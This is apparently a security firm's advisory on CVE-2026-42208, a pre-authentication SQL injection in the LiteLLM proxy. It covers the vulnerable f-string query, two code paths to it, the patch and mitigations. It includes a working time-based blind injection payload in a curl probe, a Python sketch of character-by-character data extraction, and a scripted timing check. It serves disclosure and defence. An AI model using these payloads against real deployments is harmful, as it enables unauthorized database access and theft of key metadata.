TL;DR Bishop Fox researchers reproduced and confirmed CVE-2026-42208, a critical pre-authentication SQL injection in BerriAI's LiteLLM proxy affecting versions 1.81.16 through 1.83.6. An attacker can exploit this flaw without logging in by sending a specially crafted request to an exposed endpoint, tricking the system into running unintended database queries. While the application still returns a standard “unauthorized” response, attackers can use subtle timing differences to extract sensitive information from the database. The attack also blends into normal server logs, where it looks identical to ordinary client misconfiguration errors, making it difficult to detect without specific monitoring rules. Exploitation in the wild was observed roughly 36 hours after the GitHub advisory was published. We recommend upgrading to 1.83.7 or later.
Summary
Bishop Fox researchers reproduced a critical pre-authentication SQL injection vulnerability affecting BerriAI's LiteLLM proxy in versions 1.81.16 through 1.83.6. LiteLLM is an open-source AI gateway that exposes OpenAI-compatible endpoints in front of more than 100 model providers and is increasingly common as the front door to internal LLM gateways at organizations that want unified cost tracking, key management, and rate limiting across vendors. The flaw lives inside an internal helper that resolves bearer tokens to virtual-key records, where a single missing parameter binding allows an unauthenticated attacker to inject arbitrary SQL into the proxy's PostgreSQL backend.
The vulnerability is reachable from any LLM API route (/v1/chat/completions, /v1/completions, /v1/messages, /v1/embeddings) without credentials. Because the response body is identical for every probe (HTTP 401 with a fixed JSON error), successful exploitation was confirmed with a time-based blind channel via PostgreSQL's pg_sleep(). On a stock Docker compose deployment with the BerriAI image and a default Postgres image sidecar, the application user is a database superuser, which raises the impact from "read sensitive metadata" to full read/write access against every LiteLLM-managed table, including LiteLLM_VerificationToken, where every active virtual key, team binding, and budget cap lives.
Bishop Fox's Threat Enablement & Analysis team leveraged LiteLLM fingerprints and CVE-2026-42208 detections to identify vulnerable instances across customer attack surfaces shortly after the GHSA advisory was published. These findings were handed off to Adversarial Operations, which manually validated each one. Affected customers were notified through the Bishop Fox Portal so they could patch as soon as possible.
Background
LiteLLM is a Python proxy server that consolidates credentials, request routing, cost tracking, and rate limiting for 100+ LLM providers behind a single OpenAI-compatible API surface. Users issue "virtual keys" prefixed with sk- to internal users and applications, then map each key to budget caps, model whitelists, and team or organization bindings. The proxy persists this state in a PostgreSQL database accessed via the Python Prisma client. The result is that the proxy's database is an unusually concentrated repository of value: not just credentials, but a record of who in the organization can call which model, with what budget, and on whose behalf.
Two facts about the storage layer matter for this CVE.
- First, virtual keys are stored as SHA-256 hashes, so a database compromise does not directly produce a trove of plaintext API keys.
- Second, almost every raw database query in the proxy is parameterized through Prisma's query_raw API with positional placeholders.
The combined-view lookup used during authentication is the exception, and the reason this CVE exists. The vulnerability window opened in version 1.81.16, which added a failure-metadata enrichment helper (_enrich_failure_metadata_with_key_info) that routes the raw, attacker-controlled bearer through to a pre-existing combined-view lookup. The underlying f-string SQL had been in proxy/utils.py since at least v1.81.15. What changed in 1.81.16 was the addition of an unauthenticated path to reach it, and that path remained open until the fix was implemented in 1.83.7. The advisory (GHSA-r75f-5x8p-qvmc) credits Tencent YunDing Security Lab with discovery. The v1.83.7-stable tag was published on April 18, 2026, with the GitHub Security Advisory following on April 25. According to Sysdig's analysis of customer telemetry, the first observed in-the-wild exploitation came within 36 hours of advisory publication.
Vulnerability Analysis
According to the GitHub Security Advisory, the flaw exists in the proxy's API key verification logic where "the caller-supplied key value [is interpolated] into the query text instead of passing it as a separate parameter." The vulnerable function is PrismaClient.get_data() in litellm/proxy/utils.py. When called with table_name="combined_view" (as the auth path does) and query_type="find_unique" (the function default), it constructs the lookup query with a Python f-string:

sql_query = f"""
SELECT v.*, t.spend AS team_spend, t.max_budget AS team_max_budget, ...
FROM "LiteLLM_VerificationToken" AS v
LEFT JOIN "LiteLLM_TeamTable" AS t ON v.team_id = t.team_id
LEFT JOIN "LiteLLM_TeamMembership" AS tm ON v.team_id = tm.team_id AND tm.user_id = v.user_id
LEFT JOIN "LiteLLM_BudgetTable" AS b ON v.budget_id = b.budget_id
LEFT JOIN "LiteLLM_OrganizationTable" AS o ON v.organization_id = o.organization_id
LEFT JOIN "LiteLLM_BudgetTable" AS b2 ON o.budget_id = b2.budget_id
WHERE v.token = '{token}'
"""
response = await self._query_first_with_cached_plan_fallback(sql_query)
The {token} interpolation is the sink. The string is sent to PostgreSQL via Prisma's query_first() method without any parameter binding. The function trusts that the token has already been hashed by the time it arrives, an assumption encoded in a small helper called _hash_token_if_needed:
def _hash_token_if_needed(token: str) -> str:
    if token.startswith("sk-"):
        return hash_token(token=token)
    else:
        return token
If the bearer starts with sk-, it is SHA-256 hashed and only hexadecimal characters reach the SQL. If it does not start with sk-, the helper returns the original string verbatim. The combination of these design choices is the entire vulnerability in three components: a query template that interpolates the bearer as a literal SQL string, a hashing helper that conditionally sanitizes its input based on a prefix check, and a failure-callback path that invokes the lookup with an unsanitized bearer.
Combined with the f-string sink, an attacker who supplies a bearer like ' OR (SELECT pg_sleep(6)) IS NULL -- lands their payload directly inside the single-quoted WHERE clause:
WHERE v.token = '' OR (SELECT pg_sleep(6)) IS NULL --'
PostgreSQL evaluates pg_sleep(6) once during the table scan, the entire request hangs for six seconds, and the proxy still returns a 401. Because the response body never reflects the query result, error-based, boolean-blind, and UNION-based SQLi techniques are all blocked. Only the timing channel leaks information. That timing channel is enough. Paired with pg_sleep() and a per-character binary search, the entire LiteLLM_VerificationToken table is recoverable.
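The extraction loop itself is straightforward. The sketch below simulates the timing oracle locally so the binary-search mechanics are visible; in a real attack each oracle call would be one timed HTTP request whose conditional pg_sleep payload encodes the comparison, and a slow response means "true". The SQL shape in the docstring and the sample hash value are illustrative assumptions, not captured traffic:

```python
def make_oracle(secret: str):
    """Stand-in for the timing side channel. A real probe would send one
    timed request per call with a payload along the lines of
      ' OR (CASE WHEN ascii(substr(v.token, POS, 1)) > GUESS
            THEN pg_sleep(6) ELSE pg_sleep(0) END) IS NULL --
    (illustrative shape) and treat a ~6s response as True.
    """
    def char_greater_than(pos: int, guess: int) -> bool:
        return ord(secret[pos]) > guess
    return char_greater_than

def extract(oracle, length: int) -> str:
    recovered = []
    for pos in range(length):
        lo, hi = 0, 255
        # Binary search over the byte value: ~8 oracle calls per
        # character instead of up to 256 with a linear scan.
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(pos, mid):
                lo = mid + 1
            else:
                hi = mid
        recovered.append(chr(lo))
    return "".join(recovered)

# "deadbeef" stands in for a fragment of one stored token hash.
print(extract(make_oracle("deadbeef"), 8))  # -> deadbeef
```

At roughly eight requests per character, a full 64-character SHA-256 hash costs on the order of 500 requests per key, which is unremarkable traffic volume against an API gateway.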
The failure mode is also nearly invisible to a defender. The HTTP response from a vulnerable host under attack is a normal-looking 401 with the standard LiteLLM auth-error JSON: {"error":{"message":"Authentication Error, ...","type":"auth_error","code":"401"}}. The only outwardly visible anomaly is response latency, and only if the defender is monitoring per-endpoint p99 latency for the auth-failure path specifically. Server-side, the assertion error is logged by verbose_proxy_logger.exception() at auth_exception_handler.py:78, which produces a stack trace including the masked bearer ("Received=' ORL --, expected to start with 'sk-'"). Those log lines look identical to noise from misconfigured clients hitting the proxy without an sk- prefix. Without log-volume baselines or specific detection rules, the attack is essentially indistinguishable from friendly client misuse.
Two Paths to the Sink
The interesting wrinkle in this CVE is that get_data() is reachable from an unauthenticated request through two distinct code paths, and patching one of them was the original mitigation strategy.
The proxy's auth dispatcher in litellm/proxy/auth/user_api_key_auth.py includes a defensive guard intended to prevent exactly this class of bug:
assert api_key.startswith("sk-"), \
    "LiteLLM Virtual Key expected. Received={}, expected to start with 'sk-'.".format(_masked_key)
if api_key.startswith("sk-"):
    api_key = hash_token(token=api_key)
valid_token = await get_key_object(hashed_token=api_key, ...)
There are two ways past this guard:
- Path A: assertion stripped. Python assert statements are removed at bytecode load when the interpreter runs with -O or PYTHONOPTIMIZE=1. Some hardened container images apply this optimization, in which case the raw, attacker-controlled bearer flows directly into get_key_object() and through to the SQL sink.
- Path B: assertion fires (default). The AssertionError raised by the guard is caught by an outer except Exception clause that dispatches to UserAPIKeyAuthExceptionHandler._handle_authentication_error(). That handler awaits proxy_logging_obj.post_call_failure_hook(...), which iterates litellm.callbacks and invokes _ProxyDBLogger.async_post_call_failure_hook(). Inside, the metadata dict is populated with _metadata["user_api_key"] = user_api_key_dict.api_key (the raw bearer) and passed to _enrich_failure_metadata_with_key_info(), which calls get_key_object(hashed_token=api_key_hash, ...). Despite the variable name, api_key_hash here is unhashed.
Both paths arrive at the same SQL sink with the same attacker-controlled string, so exploitation is identical between them once the sink is reached. The advisory's published workaround (general_settings.disable_error_logs: true) only mitigates Path B by short-circuiting _ProxyDBLogger._should_track_errors_in_db() before the failure callback runs. A hardened deployment running with -O would remain exploitable through Path A even with the workaround in place. Path B is the path we exercised in our lab against a stock Docker deployment, where the BerriAI image runs with assertions enabled and the failure callback fires on every non-sk- bearer. Path A's reachability was established through source-level analysis of the assertion-stripped case; we did not separately exercise it.
The variable name api_key_hash in _enrich_failure_metadata_with_key_info deserves a callout for anyone reviewing the proxy's source. The name strongly implies a hashed value, and a security review focused on grep'ing for raw bearer tokens would skim past it. In reality the variable holds whatever was assigned to _metadata["user_api_key"] upstream, which traces back to user_api_key_dict.api_key, the raw attacker-controlled string. Misnamed variables are a remarkably durable source of vulnerability classes.
Testing for Exposure
A single timed HTTP request is enough to determine whether a LiteLLM deployment is vulnerable. The probe payload below exercises the f-string injection path described in the GHSA advisory and triggers pg_sleep in the proxy's PostgreSQL backend, producing an unambiguous timing differential.
$ time curl -X POST https://TARGET/v1/chat/completions \
-H "Authorization: Bearer ' OR (SELECT pg_sleep(6)) IS NULL --" \
-H "Content-Type: application/json" \
-d '{"model":"x","messages":[{"role":"user","content":"x"}]}'
...omitted for brevity...
0.00s user 0.01s system 0% cpu 6.058 total
A vulnerable host returns HTTP 401 in approximately six seconds. A patched host returns HTTP 401 in under 100 milliseconds. The delta is unmistakable. We confirmed this end-to-end against the published ghcr.io/berriai/litellm-database:v1.83.6-nightly image with a default PostgreSQL 16 backend; PostgreSQL server logs captured the injected query verbatim:
WHERE v.token = '' OR (SELECT pg_sleep(6)) IS NULL --'
To rule out network jitter or an intermediate WAF tarpit, repeat the request two or three times. A consistent multi-second delay only on the payload request indicates the vulnerability; uniform slowness regardless of payload indicates a tarpit or other latency source. The probe issues a single SQL query against the verification token table and does not exfiltrate any database content.
Two preconditions matter for the test to be conclusive: the deployment must use a PostgreSQL backend (the default), and general_settings.disable_error_logs must be at its default value of false. A freshly initialized proxy with zero rows in LiteLLM_VerificationToken will not trigger the timing channel because PostgreSQL skips the WHERE evaluation on an empty table, but any production deployment satisfies that precondition by definition.
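The repeat-and-compare procedure above is easy to script. The sketch below is a hypothetical probe built on Python's standard library, not a Bishop Fox tool: it times a benign failing bearer against the injection payload and classifies the delta, which separates a genuine pg_sleep differential from a tarpit that slows every request equally. The URL and threshold are assumptions you would tune per target:

```python
import time
import urllib.request

PAYLOAD = "' OR (SELECT pg_sleep(6)) IS NULL --"
BENIGN = "not-a-key"  # also fails auth, but injects nothing

def timed_probe(base_url: str, bearer: str) -> float:
    """Send one chat-completions request and return wall-clock latency.
    The expected HTTP 401 raises HTTPError; only the timing matters."""
    req = urllib.request.Request(
        base_url + "/v1/chat/completions",
        data=b'{"model":"x","messages":[{"role":"user","content":"x"}]}',
        headers={"Authorization": "Bearer " + bearer,
                 "Content-Type": "application/json"},
        method="POST",
    )
    start = time.monotonic()
    try:
        urllib.request.urlopen(req, timeout=30)
    except Exception:
        pass  # 401s and TLS errors alike: we only care about elapsed time
    return time.monotonic() - start

def classify(benign_s: float, payload_s: float, delay: float = 6.0) -> str:
    # A vulnerable host shows the pg_sleep delay only on the payload
    # probe; a tarpit or slow network slows both probes equally.
    if payload_s - benign_s > delay * 0.8:
        return "likely vulnerable"
    return "no timing differential"

# Example usage (against a host you are authorized to test):
#   verdict = classify(timed_probe(url, BENIGN), timed_probe(url, PAYLOAD))
```

Running both probes back to back, two or three times each, gives the same signal as the manual curl test with far less room for eyeballing error.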
Why this matters: the database behind a LiteLLM deployment holds every active virtual key (as a SHA-256 hash), every team and organization binding, and every spend record. Confirming exposure with a single timed request and patching to 1.83.7 takes less effort than the post-incident rotation cycle.
The Patch
LiteLLM addressed the vulnerability in version 1.83.7 with a two-pronged fix to proxy/utils.py. The primary combined_view lookup, the sink we exploited, retained its raw SQL form but introduced a positional placeholder so the user-supplied value is passed as a separate parameter:
sql_query = """
    SELECT v.*, t.spend AS team_spend, ...
    FROM "LiteLLM_VerificationToken" AS v
    LEFT JOIN ...
    WHERE v.token = $1
"""
response = await self._query_first_with_cached_plan_fallback(
    sql_query, hashed_token
)
The sister deprecated-token lookup was extracted to a helper and rewritten using Prisma's typed find_first() API:
deprecated_row = await self.db.litellm_deprecatedverificationtoken.find_first(
where={
"token": hashed_token,
"revoke_at": {"gt": datetime.now(timezone.utc)},
},
select={"active_token_id": True},
)
The fix commit has a refreshingly direct message: "fix: refactor, race condition handle, fstring sql injection." The patch is contained to litellm/proxy/utils.py and key_management_endpoints.py, requires no schema migrations, and does not change any externally observable behavior beyond eliminating the injection. The fix is the right shape.
Rather than auditing every f-string call site, the maintainers fixed the two auth-path queries directly through proper parameter binding, one via PostgreSQL placeholders and the other via Prisma's typed API. Both approaches close the injection at the sink, which means the fix holds against either Path A or Path B regardless of which caller reaches it.
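The difference between the vulnerable and patched query shapes can be demonstrated end to end without a LiteLLM deployment. The sketch below uses Python's stdlib sqlite3 in place of PostgreSQL and Prisma purely for a self-contained demo; the placeholder syntax differs (? versus $1), but the parameter-binding semantics that close the injection are the same:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute('CREATE TABLE "LiteLLM_VerificationToken" (token TEXT)')
conn.execute('INSERT INTO "LiteLLM_VerificationToken" VALUES (?)',
             ("deadbeef",))  # hypothetical stored token hash

payload = "' OR 1=1 --"

# Vulnerable shape: the bearer is interpolated into the query text,
# so the payload rewrites the WHERE clause and matches every row.
vulnerable = conn.execute(
    f'SELECT token FROM "LiteLLM_VerificationToken" '
    f"WHERE token = '{payload}'"
).fetchall()

# Patched shape: the bearer travels as a bound parameter, so the
# payload is compared as an ordinary string and matches nothing.
patched = conn.execute(
    'SELECT token FROM "LiteLLM_VerificationToken" WHERE token = ?',
    (payload,),
).fetchall()

print(vulnerable)  # -> [('deadbeef',)] : injection succeeded
print(patched)     # -> []              : injection neutralized
```

Binding at the sink is what makes the fix caller-agnostic: no future refactor of the auth or logging layers can reintroduce the injection through this query, because the driver never parses the bearer as SQL.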
Conclusion
CVE-2026-42208 is a textbook example of an f-string SQL injection in an internal helper function reached through an exception path nobody thought of as a privileged context. The auth dispatcher's assert was clearly written as a defensive guard against this exact class of bug, but the guard's failure mode was an exception caught by a generic handler that re-introduced the unsanitized input into a database lookup six call frames away. Defense-in-depth only works if the depths are connected.
The 36-hour interval from public advisory to in-the-wild exploitation is worth dwelling on. The advisory disclosed the affected version range and a one-line workaround, and the open-source schema disclosed the table and column names. Together they were enough for an attacker to reconstruct a working exploit faster than most organizations can complete a change-control ticket.
As Sysdig's Michael Clark put it: "exploitation no longer waits for a public PoC." For organizations operating LLM gateways exposed to untrusted networks, the action items are short:
- Confirm the running version with GET /health/readiness and upgrade to 1.83.7 or later.
- As an interim mitigation, set general_settings.disable_error_logs: true in the LiteLLM config, and pair it with a WAF rule rejecting any Authorization: Bearer value that does not match ^sk-[A-Za-z0-9_-]+$.
- Rotate every virtual key that was live during the vulnerable window. Hash recovery is computationally expensive, but the metadata exposure (key aliases, owners, budgets) is sufficient input for follow-on social engineering even without plaintext key recovery.
Bishop Fox's Cosmos platform actively scans customer attack surfaces for vulnerable LiteLLM deployments and alerts customers within hours of new CVE disclosures of this severity. As AI infrastructure rapidly expands and new attack paths emerge, maintaining visibility becomes critical. If you want to learn more or see a demo of Cosmos, Get Started here.